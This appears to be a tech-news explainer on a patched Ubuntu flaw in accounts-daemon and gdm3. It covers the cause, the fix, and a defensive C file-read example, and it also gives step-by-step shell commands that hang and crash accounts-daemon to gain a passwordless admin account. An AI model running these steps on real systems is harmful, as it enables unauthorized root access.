How to Exploit and Patch Ubuntu’s Silent Sudo User Vulnerability
This article explains a critical Ubuntu flaw that lets a standard user create a new sudo account and gain root privileges without a system password, details the step‑by‑step exploitation process, and outlines the official patches released to fix the issue.
Attack Method
Open a terminal in your home directory and create a symbolic link named .pam_environment that points to /dev/zero:
ln -s /dev/zero .pam_environment
If the command fails, a .pam_environment file already exists; rename it as a backup before proceeding.
Next, open Settings → Region & Language and attempt to change the language. The dialog will freeze; simply ignore it and return to the terminal.
At this point the accounts-daemon process consumes 100% CPU, slowing and heating the machine.
Delete the symbolic link to restore normal operation:
rm .pam_environment
Find the PID of accounts-daemon (it appears at the top of top because it is stuck in an infinite loop) or use pidof:
pidof accounts-daemon
Send a SIGSTOP signal to pause the daemon:
kill -SIGSTOP 597
Set a timer that, after logging out, sends SIGSEGV and then SIGCONT to the daemon to force it to crash and reset:
nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597"
After logging out and waiting a few seconds, the exploit triggers a series of dialogs that allow you to create a new user account with administrator privileges, enabling sudo commands.
Attack Principle
The vulnerability exploits two bugs in Ubuntu:
The accountsservice daemon (accounts-daemon) reads a file named .pam_environment from the user's home directory via the function is_in_pam_environment. By linking this file to /dev/zero, the daemon reads an infinitely long stream, causing it to hang and lose its root privileges.
The GNOME Display Manager (gdm3) relies on accounts-daemon to determine the number of existing users during the initial system setup. When accounts-daemon is stuck, gdm3 times out, assumes zero users, and launches gnome-initial-setup, which requires an administrator account.
By crashing accounts‑daemon and forcing gdm3 to think no users exist, the attacker can create a new admin account without a password.
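The first bug comes down to a privileged daemon reading a user-controlled path without checking what it points to. A defensive read for that case, as an added example (not accountsservice's code and not the official patch); the function name read_user_file_bounded and the 4096-byte limit are assumptions, and the ELOOP behaviour is that of Linux:

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not accountsservice code: read a user-controlled file
 * defensively. Returns bytes read, or -1 with errno set if it is refused. */
ssize_t read_user_file_bounded(const char *path, char *buf, size_t cap)
{
    /* O_NOFOLLOW: fail with ELOOP if the last path component is a symlink.
     * O_NONBLOCK: do not hang in open() if the path is a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    int err = 0;
    if (fstat(fd, &st) != 0)
        err = errno;
    else if (!S_ISREG(st.st_mode))      /* devices such as /dev/zero */
        err = EINVAL;
    else if ((size_t)st.st_size > cap)  /* larger than the caller allows */
        err = EFBIG;

    size_t total = 0;
    while (err == 0 && total < cap) {   /* hard cap even if the file grows */
        ssize_t n = read(fd, buf + total, cap - total);
        if (n == 0)
            break;
        if (n > 0)
            total += (size_t)n;
        else if (errno != EINTR)
            err = errno;
    }
    close(fd);
    if (err != 0)
        errno = err;
    return err != 0 ? -1 : (ssize_t)total;
}

int main(int argc, char **argv)
{
    char buf[4096];                     /* assumed size limit for this demo */
    const char *path = argc > 1 ? argv[1] : "/dev/zero";
    ssize_t n = read_user_file_bounded(path, buf, sizeof buf);
    printf("%s: %s\n", path, n < 0 ? "refused" : "accepted");
    return n < 0;
}
```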
Official Fix
Security researcher Kevin Backhouse reported the bugs on October 17. Ubuntu and GNOME have released patches in the latest code; users should update their systems immediately.
The vulnerability only affects desktop editions of Ubuntu. Systems using only a command‑line interface or non‑GNOME desktop environments are not impacted.
21CTO
